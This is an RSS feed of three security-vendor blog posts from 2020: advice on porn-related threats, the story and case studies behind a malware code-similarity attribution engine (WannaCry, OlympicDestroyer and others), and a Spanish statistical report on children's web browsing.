The overview of porn-related threats allows us to draw a few substantial conclusions. While we have not seen many changes in the techniques used by cybercriminals, statistics show that this topic remains a steady source of threats. Although PC malware distribution has been dropping – a trend that we have seen lately for a variety of threats – mobile malware is on the rise. With users increasingly using mobile devices for more tasks than ever (and that includes different types of entertainment), it is likely that cybercriminals have responded to this trend. While we cannot confirm a correlation, significant changes in the number of users affected both by PC and mobile malware relating to adult content allows us to at least theorize that this is one of the reasons for the change.

Another important conclusion to draw attention to is that of abuse of privacy. While some users have taken their privacy to a new level by anonymously purchasing online accounts, others remain at more risk than ever of compromising their data. Both the leaks we have seen in the media in the past year and the availability of personal or private information on the dark market for minimal sums suggest that the risks to users are increasing. With cybercriminals able to cross-reference various leaked databases of users, they are able to make more informed decisions on who to target and how, making sextortion and scamming more effective. More than ever, users need to take serious steps to protect themselves by applying advanced security measures and educating themselves on handling their data on the web and evaluating what risks exposure entails.

To consume and produce adult content safely, Kaspersky advises the following:

For consumers:

  • Pay attention to the website’s authenticity. Do not visit websites until you are sure they are legitimate and start with ‘https’. Confirm that the website is genuine by double-checking the format of the URL or the spelling of the company name and try looking for reviews of sites that seem suspicious;
  • If you want to buy a paid subscription to an adult content website, only purchase it on the official website. Double-check the URL of the website and make sure it’s authentic;
  • Check any email attachments with a security solution before opening them – especially from dark web entities (even if they are expected to come from an anonymous source);
  • Patch the software on your PC as soon as security updates for the latest bugs are available;
  • Do not download pirated software and other illegal content. Even if you were redirected to the webpage from a legitimate website;
  • Check application permissions on Android devices to see what your installed apps are allowed to do;
  • Do not install applications from untrusted sources, even if they are actively advertised, and block the installation of programs from unknown sources in your smartphone settings;
  • Use a reliable security solution with behavior-based anti-phishing technologies – such as Kaspersky Security Cloud to detect and block spam and phishing attacks. The solution also incorporates the Permission Checker feature for Android that helps users identify potentially dangerous or questionable requests made by the downloaded app, and explain the risks associated with different types of common permissions.

For businesses:

  • Educate employees on the risks of reckless online behavior – both for themselves and for the business. Schedule basic security awareness training for your employees, such as Kaspersky Automated Security Awareness Platform that covers email security and internet security, among other essential practices.
Contributor:
Copyright:
Category: Featured
Date: Mon, 15 Jun 2020 10:00:05 +0000
Local date: Mon, 15 Jun 2020 10:00:05 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 1200 px
itemImageHeight: 800 px
Looking at Big Threats Using Code Similarity. Part 1
Author: Costin Raiu
Link :
Email :
Description: Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience.
Full content:

Today, we are announcing the release of KTAE, the Kaspersky Threat Attribution Engine. This code attribution technology, developed initially for internal use by the Kaspersky Global Research and Analysis Team, is now being made available to a wider audience. You can read more about KTAE in our official press release, or go directly to its info page on the Kaspersky Enterprise site. From an internal tool, to prototype and product, this is a road which took about 3 years. We tell the story of this trip below, while throwing in a few code examples as well. However, before diving into KTAE, it’s important to talk about how it all started, on a sunny day, approximately three years ago.

May 12, 2017, a Friday, started in a very similar fashion to many other Fridays: I woke up, made coffee, showered and drove to work. As I was reading e-mails, one message from a colleague in Spain caught my attention. Its subject said “Crisis … (and more)”. Now, crisis (and more!) is not something that people appreciate on a Friday, and it wasn’t April 1st either. Going through the e-mail from my colleague, it became obvious something was going on in several companies around the world. The e-mail even had an attachment with a photo, which is now world famous:

Soon after that, Spain’s Computer Emergency Response Team CCN-CERT, posted an alert on their site about a massive ransomware attack affecting several Spanish organizations. The alert recommended the installation of updates in the Microsoft March 2017 Security Bulletin as a means of stopping the spread of the attack. Meanwhile, the National Health Service (NHS) in the U.K. also issued an alert and confirmed infections at 16 medical institutions.

As we dug into the attack, we confirmed additional infections in several additional countries, including Russia, Ukraine, and India.

Quite essential in stopping these attacks was the Kaspersky System Watcher component. The System Watcher component has the ability to rollback the changes done by ransomware in the event that a malicious sample manages to bypass other defenses. This is extremely useful in case a ransomware sample slips past defenses and attempts to encrypt the data on the disk.

As we kept analysing the attack, we started learning more things; for instance, the infection relied on a famous exploit, (codenamed “EternalBlue”), that has been made available on the internet through the Shadowbrokers dump on April 14th, 2017 and patched by Microsoft on March 14. Despite the fact the patch has been available for two months, it appeared that many companies didn’t patch. We put together a couple of blogs, updated our technical support pages and made sure all samples were detected and blocked even on systems that were vulnerable to the EternalBlue exploit.

Meanwhile, as everyone was trying to research the samples, we were scouting for any possible links to known criminal or APT groups, trying to determine how a newcomer malware was able to cause such a pandemic in just a few days. The explanation here is simple – for ransomware, it is not very often that we get to see completely new, built from scratch, pandemic-level samples. In most cases, ransomware attacks make use of some popular malware that is sold by criminals on underground forums or, “as a service”.

And yet, we couldn’t spot any links with known ransomware variants. Things became a bit clearer on Monday evening, when Neel Mehta, a researcher at Google, posted a mysterious message on Twitter with the #WannaCryptAttribution hashtag:

The cryptic message in fact referred to a similarity between two samples that have shared code. The two samples Neel refers to in the post were:

  • A WannaCry sample from February 2017 which looks like a very early variant
  • A Lazarus APT group sample from February 2015

The similarity can be observed in the screenshot below, taken between the two samples, with the shared code highlighted:

Although some people doubted the link, we immediately realized that Neel Mehta was right. We put together a blog diving into this similarity, “WannaCry and Lazarus Group – the missing link?”. The discovery of this code overlap was obviously not a random hit. For years, Google integrated the technology they acquired from Zynamics into their analysis tools making it possible to cluster together malware samples based on shared code. Obviously, the technology seemed to work rather nicely. Interestingly, one month later, an article was published suggesting the NSA also reportedly believed in this link.

Thinking about the story, the overlap between WannaCry and Lazarus, we put a plan together – what if we built a technology that can quickly identify code reuse between malware attacks and pinpoint the likely culprits in future cases? The goal would be to make this technology available in a larger fashion to assist threat hunters, SOCs and CERTs speed up incident response or malware triage. The first prototype for this new technology was available internally June 2017, and we continued to work on it, fine-tuning it, over the next months.

In principle, the problem of code similarity is relatively easy. Several approaches have been tested and discussed in the past, including:

  • Calculating checksums for subs and comparing them against a database
  • Reconstructing the code flow and creating a graph from it; comparing graphs for similar structures
  • Extracting n-grams and comparing them against a database
  • Using fuzzy hashes on the whole file or parts of it
  • Using metadata, such as the rich header, exports or other parts of the file; although this isn’t code similarity, it can still yield some very good results

To find the common code between two malware samples, one can, for instance, extract all 8-16 byte strings, then check for overlaps. There’s two main problems to that though:

  • Our malware collection is too big; if we want to do this for all the files we have, we’d need a large computing cluster (read: thousands of machines) and lots of storage (read: Petabytes)
  • Capex too small

Additionally, doing this massive code extraction, profiling and storage, not to mention searching, in an efficient way that we can provide as a stand-alone box, VM or appliance is another level of complexity.

To refine it, we started experimenting with code-based Yara rules. The idea was also simple and beautiful: create a Yara rule from the unique code found in a sample, then use our existing systems to scan the malware collection with that Yara rule.

Here’s one such example, inspired by WannaCry:

This innocent looking Yara rule above catches BlueNoroff (malware used in the Bangladesh Bank Heist), ManusCrypt (a more complex malware used by the Lazarus APT, also known as FALLCHILL) and Decafett, a keylogger that we previously couldn’t associate with any known APT.

A breakthrough in terms of identifying shared code came in Sep 2017, when for the first time we were able to associate a new, “unknown” malware with a known entity or set of tools. This happened during the #CCleaner incident, which was initially spotted by Morphisec and Cisco Talos.

In particular, our technology spotted a fragment of code, part of a custom base64 encoding subroutine, in the Cbkrdr shellcode loader that was identical to one seen in a previous malware sample named Missl, allegedly used by APT17:

Digging deeper, we identified at least three malware families that shared this code: Missl, Zoxpng/Gresim and Hikit, as shown below in the Yara hits:

In particular, the hits above are the results of running a custom Yara rule, based on what we call “genotypes” – unique fragments of code, extracted from a malware sample, that do not appear in any clean sample and are specific to that malware family (as opposed to being a known piece of library code, such as zlib for instance).

As a side note, Kris McConkey from PwC delivered a wonderful dive into Axiom’s tools during his talk “Following APT OpSec failures” at SAS 2015 – highly recommended if you’re interested in  learning more about this APT super-group.

Soon, the Kaspersky Threat Attribution Engine – “KTAE” – also nicknamed internally “Yana”, became one of the most important tools in our analysis cycle.

Digging deeper, or more case studies

The United States Cyber Command, or in short, “USCYBERCOM”, began posting samples to VirusTotal in November 2018, an excellent move in our opinion. The only drawback for these uploads was the lack of any context, such as the malware family, if it’s APT or criminal, which group uses them and whether they were found in the wild, or scooped from certain places. Although the first upload, a repurposed Absolute Computrace loader, wasn’t much of an issue to recognize, an upload from May 2019 was a bit more tricky to identify. This was immediately flagged as Sofacy by our technology, in particular, as similar to known XTunnel samples, a backdoor used by the group. Here’s how the KTAE report looks like for the sample in question:

Analysis for d51d485f98810ab1278df4e41b692761

In February 2020, USCYBERCOM posted another batch of samples that we quickly checked with KTAE. The results indicated a pack of different malware families, used by several APT groups, including Lazarus, with their BlueNoroff subgroup, Andariel, HollyCheng, with shared code fragments stretching back to the DarkSeoul attack, Operation Blockbuster and the SPE Hack.

Going further, USCYBERCOM posted another batch of samples in May 2020, for which KTAE revealed a similar pattern.

Of course, one might wonder, what else can KTAE do except help with the identification of VT dumps from USCYBERCOM?

For a more practical check, we looked at the samples from the 2018 SingHealth data breach that, according to Wikipedia, was initiated by unidentified state actors. Although most samples used in the attack are rather custom and do not show any similarity with previous attacks, two of them have rather interesting links:

KTAE analysis for two samples used in the SingHealth data breach

Mofang, a suspected Chinese-speaking threat actor, was described in more detail in 2016 by this FOX-IT research paper, written by Yonathan Klijnsma and his colleagues. Interestingly, the paper also mentioned Singapore as a suspected country where this actor is active. Although the similarity is extremely weak, 4% and 1% respectively, they can easily point the investigator in the right direction for more investigation.

Another interesting case is the discovery and publication (“DEADLYKISS: HIT ONE TO RULE THEM ALL. TELSY DISCOVERED A PROBABLE STILL UNKNOWN AND UNTREATED APT MALWARE AIMED AT COMPROMISING INTERNET SERVICE PROVIDERS“) from our colleagues at Telsy of a new, previously unknown malware deemed “DeadlyKiss”. A quick check with KTAE on the artifact with sha256 c0d70c678fcf073e6b5ad0bce14d8904b56d73595a6dde764f95d043607e639b (md5: 608f3f7f117daf1dc9378c4f56d5946f) reveals a couple of interesting similarities with other Platinum APT samples, both in terms of code and unique strings.

Analysis for 608f3f7f117daf1dc9378c4f56d5946f

Another interesting case presented itself when we were analysing a set of files included in one of the Shadowbrokers dumps.

Analysis for 07cc65907642abdc8972e62c1467e83b

In the case above, “cnli-1.dll” (md5: 07cc65907642abdc8972e62c1467e83b) is flagged as being up to 8% similar to Regin. Looking into the file, we spot this as a DLL, with a number of custom looking exports:

Looking into these exports, for instance, fileWriteEx, shows the library has actually been created to act as a wrapper for popular IO functions, most likely for portability purposes, enabling the code to be compiled for different platforms:

Speaking of multiplatform malware, recently, our colleagues from Leonardo published their awesome analysis of a new set of Turla samples, targeting Linux systems. Originally, we published about those in 2014, when we discovered Turla Penquin, which is one of this group’s backdoors for Linux. One of these samples (sha256: 67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502) was uploaded to VirusTotal in April 2020. A quick check in KTAE for this sample reveals the following:

Analysis for b4587870ecf51e8ef67d98bb83bc4be7 – Turla 64 bit Penquin sample

We can see a very high degree of similarity with two other samples (99% and 99% respectively) as well as other lower similarity hits to other known Turla Penquin samples. Looking at the strings they have in common, we immediately spot a few very good candidates for Yara rules—quite notably, some of them were already included in the Yara rules that Leonardo provided with their paper.

 

When code similarity fails

When looking at an exciting, brand new technology, sometimes it’s easy to overlook any drawbacks and limitations. However, it’s important to understand that code similarity technologies can only point in a certain direction, while it’s still the analyst’s duty to verify and confirm the leads. As one of my friends used to say, “the best malware similarity technology is still not a replacement for your brain” (apologies, dear friend, if the quote is not 100% exact, that was some time ago). This leads us to the case of OlympicDestroyer, a very interesting attack, originally described and named by Cisco Talos.

In their blog, the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code, and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Soon after the Talos publication, the Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups. As a side node, IntezerLabs have an exceptional code similarity technology themselves that you can check out by visiting their site at analyze.intezer.com.

IntezerLabs further released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later, media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media, said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

Another company, Recorded Future, decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

During this “attribution hell”, we also used KTAE to check the samples for any possible links to previous known campaigns. And amazingly, KTAE discovered a unique pattern that also linked Olympic Destroyer to Lazarus. A combination of certain code development environment features stored in executable files, known as a Rich header, may be used as a fingerprint identifying the malware authors and their projects in some cases. In the case of the Olympic Destroyer wiper sample analyzed by Kaspersky, this “fingerprint” produced a match with a previously known Lazarus malware sample. Here’s how today’s KTAE reports it:

Analysis for 3c0d740347b0362331c882c2dee96dbf

The 4% similarity shown above comes from the matches in the sample’s Rich header. Initially, we were surprised to find the link, even though it made sense; other companies also spotted the similarities and Lazarus was already known for many destructive attacks. Something seemed odd though. The possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on 9 February, 2018. As we dug deeper into this case, we concluded it was an elaborate false flag; further research allowed us to associate the attack with the Hades APT group (make sure you also read our analysis: “Olympic destroyer is here to trick the industry“).

This proves that even the best attribution or code similarity technology can be influenced by a sophisticated attacker, and the tools shouldn’t be relied upon blindly. Of course, in 9 out of 10 cases, the hints work very well. As actors become more and more skilled and attribution becomes a sensitive geopolitical topic, we might experience more false flags such as the ones found in the OlympicDestroyer.

If you liked this blog, then you can hear more about KTAE and using it to generate effective Yara rules during the upcoming “GReAT Ideas, powered by SAS” webinar, where, together with my colleague Kurt Baumgartner, we will be discussing practical threat hunting and how KTAE can boost your research. Make sure to register for GReAT Ideas, powered by SAS, by clicking here.

Register: https://www.brighttalk.com/webcast/15591/414427

Note: more information about the APTs discussed here, as well as KTAE, is available to customers of Kaspersky Intelligence Reporting. Contact: intelreports@kaspersky.com

 

Contributor:
Copyright:
Category: Featured
Date: Tue, 09 Jun 2020 10:00:37 +0000
Local date: Tue, 09 Jun 2020 10:00:37 +0000
Latitude:
Longitude:
Language: en-US
Encoding: UTF-8
Feed type: RSS
itemImageThumbnailUrl:
itemImageWidth: 700 px
itemImageHeight: 500 px
Niños en Internet en 2020
Author: Anna Larkina
Link :
Email :
Description: Hoy,en todo el mundo estamos ante una demostración sin precedentes de que las tecnologías digitales ayudan al desarrollo de los niños, en vez de obstaculizarlo.
Full content:

En un mundo donde la pandemia hace de las suyas, la tecnología nos ayuda a que nuestra forma de vida habitual cambie por completo: a que el proceso educativo no se detenga, a que no suframos por la falta de comunicación y a que sigamos viviendo lo más plenamente posible en condiciones de aislamiento y distancia social. Muchos adultos y niños también se han dado cuenta de que la computadora no solo es un medio de entretenimiento, sino también una herramienta importante para la educación, la comunicación y el desarrollo personal.

En este artículo, analizaremos qué cambios han ocurrido en el comportamiento de los niños en Internet a lo largo del año y durante la pandemia. El informe se basa en estadísticas compiladas por la solución Kaspersky Safe Kids, que protege a los niños contra contenidos inapropiados en Internet.

Cómo se recopilan las estadísticas

Kaspersky Safe Kids analiza el contenido de la página web a la que el niño está intentando acceder. Si el sitio pertenece a una de las catorce categorías no deseadas, el módulo envía una notificación a Kaspersky Security Network. Pero no se transmiten datos personales del usuario y no se viola la privacidad.

Hacemos hincapié dos puntos importantes:

  • Los padres deciden qué contenido bloquear, y configuran la solución de seguridad según sus requerimientos. No obstante, se recogen estadísticas anónimas de las 14 categorías.
  • La información se ha recopilado en computadoras que ejecutan Windows y macOS. En este informe no se presentan las estadísticas de los dispositivos móviles.

Categorización de sitios web

El producto Kaspersky Safe Kids filtra las siguientes categorías:

En este artículo, examinaremos en detalle las categorías que recibieron el mayor número de visitas en el año anterior. Las categorías menos populares las combinaremos en una categoría aparte, donde marcaremos como “Otras” las detecciones que provoquen.

Imagen del mundo

Categorización de notificaciones de Kaspersky Safe Kids, junio de 2019 – mayo de 2020 (descargar)

En todo el mundo, los niños suelen pasar su tiempo mirando videos y escuchando música. Durante el año pasado, casi el 40% de todas las notificaciones de Safe Kids correspondió a las categorías de software, audio y video. Le sigue la categoría “Redes” (24,16%), mientras que el tercer lugar lo ocupan los juegos de computadora, con el 15,98%. Las tiendas en línea ocupan el cuarto lugar en términos de popularidad (11%) y las noticias ocupan el quinto lugar (5,54%).

Es curioso que los recursos de la categoría “Búsqueda de empleo” (0,89%) sean de mayor interés para los adolescentes que los sitios “Para adultos” (0,74%).

Categorización de las notificaciones de Kaspersky Safe Kids para Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Los usuarios de Windows pasan más tiempo viendo videos, jugando juegos y leyendo noticias que los usuarios de macOS. Estos últimos prefieren socializar y pasan mucho más tiempo en las tiendas en línea. Pero en promedio, durante el año son los usuarios de Windows quienes miran con mayor frecuencia contenidos para adultos.

Categorización de notificaciones de Kaspersky Safe Kids, junio de 2019 – mayo de 2020 (descargar)

Debido a la pandemia, los niños se ven obligados a estudiar en casa, asistir a clases en línea: esta la forma en que han pasado su tiempo en la computadora. Desde principios de año, visitaron con menor frecuencia los sitios web dedicados a juegos de computadora, incluso en comparación con la tasa más baja de 2019 (16,75% en septiembre): en mayo, este índice cayó al 13,26%. Por el contrario, la participación de la categoría “Comunicación en Internet” mostró un ligero aumento, superando en abril la tasa máxima de octubre en 0,85 puntos porcentuales, llegando al 27,51%.

Los niños visitaron más sitios web de tiendas en línea en octubre del año pasado. En ese entonces, la participación de esta categoría fue del 16,93%. A partir de ese momento, la popularidad de la categoría ha estado en constante caída y en abril disminuyó en 7,57 puntos porcentuales, hasta el 9,3%. Sin embargo, en mayo nuevamente vemos un ligero aumento. No obstante, la proporción de la categoría “Para adultos”, que aumentó ligeramente (unos 0,5 puntos porcentuales) en el invierno, en mayo volvió al nivel del verano de 2019 (0,49%).

En el gráfico puede notarse que en octubre hubo una caída anormal en las visitas a sitios de la categoría “Software, audio, video”. La razón más probable es la nueva versión de MacOS, Catalina, lanzada el 7 de octubre. Después de instalar la actualización, los usuarios tuvieron problemas para reproducir videos en YouTube, Netflix, Amazon Prime y muchos otros sitios. El problema no solo ocurría en Safari, sino también en Google Chrome, Opera y Firefox. Se solucionó en noviembre, hecho que se refleja en las estadísticas.

Distribución de notificaciones de Kaspersky Safe Kids en la categoría “Software, audio, video” en macOS, junio de 2019 – mayo de 2020 (descargar)

Diferencias por región, país y mes

Veamos en detalle cuales son las categorías más populares por región y país, para comprender si las preferencias de los niños han cambiado durante la pandemia.

Software, audio, video

En los últimos años, la categoría “Software, audio, video” ha venido superando a la categoría “Comunicación en Internet” en popularidad: en Windows y macOS, los niños ven videos y escuchan música, y se comunican usando dispositivos móviles. Incluso durante el período de cuarentena (y de educación en línea), la popularidad de esta categoría no disminuyó.

Distribución de notificaciones de Kaspersky Safe Kids en la categoría “Software, audio, video” en las plataformas Windows y Mac OS, junio de 2019 – mayo de 2020 (descargar)

Según las estadísticas de KSN recopiladas el primer semestre de 2020, la categoría “Software, audio, video” en todo el mundo comenzó a crecer, alcanzando su punto máximo de 42,47% en mayo, en todas las plataformas.

Distribución de notificaciones de Kaspersky Safe Kids en la categoría “Software, audio, video” en macOS, junio de 2019 – mayo de 2020 (descargar)

La caída del porcentaje de esta categoría en los equipos macOS en otoño e invierno, a nuestro entender, se explicó por los problemas asociados con la actualización del sistema operativo. En cuanto al declive de esta categoría entre los usuarios de Windows que ocurrió casi al mismo tiempo, se compensa con el aumento de su interés en otras categorías de sitios, como por ejemplo, el comercio electrónico.

Al final del período cubierto por este informe, la proporción de esta categoría aumentó entre los usuarios de Windows, pero los niños que usan macOS se estuvieron menos propensos a mirar videos en mayo.

Sobre todo, los niños en el sur de Asia (India, Bangladesh) pasan su tiempo mirando videos y escuchando música: 46,16%. En segundo lugar está África (44,75%), y en tercer lugar está la CIS, donde la participación de la categoría “Software, audio, video” es de 43,83%.

Distribución de las notificaciones de Kaspersky Safe Kids, categoría “Software, audio, video” por regiones, junio de 2019 – mayo 2020 (descargar)

La participación más reducida se encuentra en América del Norte (36,20%) y Europa (35,94%). Como veremos más adelante, allí los niños prefieren no solo mirar videos, sino también jugar a juegos de computadora.

Distribución de notificaciones de Kaspersky Safe Kids en la categoría “Software, audio, video” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

En Asia y el sur de Asia, los niños que usan macOS consumen contenido de audio y video con más frecuencia que los niños con Windows. En otras regiones, el índice de la categoría en Windows es más alto que en Mac OS. En los países de la CEI, el comportamiento de los niños en ambos sistemas operativos es casi el mismo.

Es interesante que la distribución de países donde es mayor el índice de la categoría “Software, audio, video” es un poco diferente de la distribución por regiones.

Distribución de las notificaciones de Kaspersky Safe Kids, categoría “Software, audio, video” por países, junio de 2019 – mayo 2020 (descargar)

Durante el año pasado, los niños de Bielorrusia (50,59%), Japón (49,67%), Arabia Saudita (49,54%) e India (47,66%) prefirieron los sitios web con videos y música. El servicio de video más popular para niños de todo el mundo es YouTube.

Comunicación en Internet

En abril de 2020, cuando se completó el proceso de transición de los estudiantes al aprendizaje a distancia, en la mayoría de los países del mundo, la proporción de la categoría “Comunicación en Internet” alcanzó su pico (27,45% de todas las detecciones).

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

En las computadoras de escritorio y portátiles con el sistema operativo macOS, observamos un aumento pronunciado de este índice: del 17,87% en junio de 2019, al 36,63% en mayo de 2020. El pico en octubre se debió a la reducción en la participación de la categoría “Software, audio, video” después de la actualización de macOS.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

En promedio, durante el período cubierto por este informe, la participación de la categoría “Comunicación en Internet” ascendió al 32,76%. En América Latina fue de 32,17%; en la CEI, del 30,54%. Su índice más bajo estuvo en Europa (15,50%) y Oceanía (16,58%).

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” por regiones, junio de 2019 – mayo de 2020 (descargar)

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” por países, promedio, junio de 2019 – mayo de 2020 (descargar)

La mayor proporción de niños que usaban una PC para leer noticias se registró en Egipto, Kenia, México y Rusia. Los índices más bajos se encuentran en Alemania, Australia, el Reino Unido y Canadá.

Desde principios de 2020, los sitios más populares de la categoría “Comunicación en Internet” han sido skype.com, hangouts.google.com, web.whatsapp.com, meet.google.com, facebook.com, twitter.com y mail.google.com.

Videojuegos

A pesar de que el porcentaje de visitas en la categoría “Juegos de computadora” para la primera mitad de 2020 muestra una tendencia a la baja, la categoría ocupa el tercer lugar en la clasificación de los temas más populares de sitios web.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Los niños juegan con mayor frecuencia en computadoras con plataforma Windows que en aquellas con Apple. Esto se debe que la mayoría de los juegos de computadora están diseñados para el sistema operativo Windows. Sin embargo, al final del período cubierto por el informe, aumentó el interés de los usuarios de macOS por los juegos.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comunicación en Internet” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Sin embargo, las visitas de niños a sitios con juegos han disminuido en todo el mundo. Esto puede atribuirse a las actividades adicionales de educación en línea que ha traído a casa la pandemia mundial. Llama la atención que desde el otoño de 2019, ha comenzado a disminuir el porcentaje de la categoría “Juegos de computadora” entre los usuarios de Windows.

Si bien América del Norte, Europa y Oceanía no mostraron una mayor actividad en las categorías “Comunicación en línea” y “Software, Audio y Video”, el porcentaje de la categoría “Juegos de computadora” en estas regiones es más alta.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Juegos de computadora” por región, junio de 2019 – mayo de 2020 (descargar)

Según nuestras estadísticas, la mayor proporción de niños interesados en los juegos se encuentra en el Reino Unido (23,94%), Estados Unidos ocupa el segundo lugar (21,61%) y Australia es el tercero (20,94%). En el Reino Unido y los EE. UU., los sitios más populares en la categoría “Juegos de computadora” son blizzard.com, roblox.com, epicgames.com, discordapp.com, ubi.com, origin.com, friv.com, curseforge.com, minecraftmods.com y crazygames.com. En Australia, los sitios más populares en esta categoría son roblox.com y varios foros de Minecraft.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Juegos de computadora” por países, junio de 2019 – mayo de 2020 (descargar)

Comercio electrónico

Otra categoría que vimos muy activa durante todo el año es el comercio electrónico.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comercio electrónico”, junio de 2019 – mayo de 2020 (descargar)

Como ya lo hemos mencionado, el súbito aumento de las detecciones de esta categoría en octubre está vinculado a que, debido a las fallas del nuevo macOS, se desestructuró la correlación porcentual entre categorías en todas las plataformas. En cambio, en noviembre y diciembre, el interés en las compras en línea entre los niños fue mayor que en otros meses. Esto no tiene nada de sorprendente: en noviembre se realiza la liquidación global del Viernes Negro en todo el mundo, y en diciembre todos están ocupados eligiendo regalos de Navidad y Año Nuevo.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comercio electrónico” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Los niños que usan macOS pasan mucho más tiempo explorando una variedad de tiendas en línea que los niños que usan Windows.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comercio electrónico”por regiones, junio de 2019 – mayo de 2020 (descargar)

Los niños de Europa, América del Norte y Oceanía, comparados con los niños de otras regiones, van más a las tiendas y están más interesados en comprar. En la CEI, Asia y América Latina, los indicadores de actividad son los más bajos del mundo.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Comercio electrónico”por países, junio de 2019 – mayo de 2020 (descargar)

Los líderes en el porcentaje de visitas a tiendas en línea son los niños de Alemania (19,51%), Emiratos Árabes Unidos (17,22%) y Canadá (15,86%). El índice más bajo se encuentra en Kazajstán (4,60%) y Egipto (5,18%).

Los sitios más visitados en Alemania son amazon.de, otto.de, ebay.com; en los Emiratos Árabes Unidos, amazon.ae, panemirates.com, amazon.com y luluhypermarket.com; en Canadá – amazon.ca, visions.ca y bestbuy.ca.

Noticias

Las noticias no solo les interesan a los adultos, sino también a los niños (especialmente en relación con los últimos eventos). Con el inicio de la cobertura periodística de la situación de la pandemia, ha aumentado el número de visitas de niños de todo el mundo a los sitios de noticias. El pico se produjo en marzo (7,26%), cuando la mayoría de los niños fueron transferidos a la educación en línea.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Noticias” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Los usuarios de Windows, en general, estaban más interesados en las noticias que los de macOS. Pero en febrero, el índice de macOS (7,25%) fue mayor que el de Windows (6,75%).

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Noticias” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Noticias” por regiones, junio de 2019 – mayo de 2020 (descargar)

La mayor parte de la categoría “Noticias” entre los usuarios de Safe Kids se registró en Europa (11,11%), Gran Bretaña (14,14%), Alemania (12,75%), Francia (10,97%) e Italia (10,25 %) La menor, en la CEI (3,17%) y África (3,96%).

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Noticias” por países, junio de 2019 – mayo de 2020 (descargar)

En el Reino Unido (14,14%), el pico de interés en las noticias tuvo lugar en febrero, al igual que en Italia (10,25%). Recordemos que fue en estos dos países donde la transferencia de la educación a Internet se realizó a fines de febrero, mientras que en Alemania (12,75%) y Francia (10,97%) esto sucedió a principios de marzo, mes en el que también ocurrió el máximo interés en las noticias en estos países.

Los niños británicos satisfacían su interés sobre la situación mundial en bbc.co.uk, dailymail.co.uk y theguardian.com. Los niños alemanes, en bild.de, tagesschau.de y n-tv.de. Los niños de Francia dieron su preferencia a leparisien.fr, lemonde.fr y francetvinfo.fr. Y los de Italia, a ansa.it, repubblica.it y gazzetta.it.

Contenido para adultos

El contenido para adultos es menos interesante para los niños. Según las estadísticas mundiales, el pico de popularidad de la categoría se produjo en enero de 2020 (1,12%), después de lo cual el interés de los niños en el contenido para adultos comenzó a disminuir hasta alcanzar el nivel anual promedio.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Para adultos” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Sin embargo, los usuarios de macOS están más interesados en la pornografía que los usuarios de Windows.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Para adultos” en las plataformas Windows y macOS, junio de 2019 – mayo de 2020 (descargar)

Si en 2019 a Windows le correspondió el mayor porcentaje de operaciones, desde principios de 2020 la imagen ha cambiado ligeramente.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Para adultos” por regiones, junio de 2019 – mayo de 2020 (descargar)

La mayor proporción de usuarios interesados en contenido para adultos se registró en la CEI (1,07%) y Europa (0,83%). Sus tasas más bajas se registraron en el mundo árabe (0,18%) y Oceanía (0,24%).

Sin embargo, la distribución por países muestra que los niños de México son los más interesados en el contenido para adultos: 1,72%.

Distribución de notificaciones de Kaspersky Safe Kids, categoría “Para adultos” por países, junio de 2019 – mayo de 2020 (descargar)

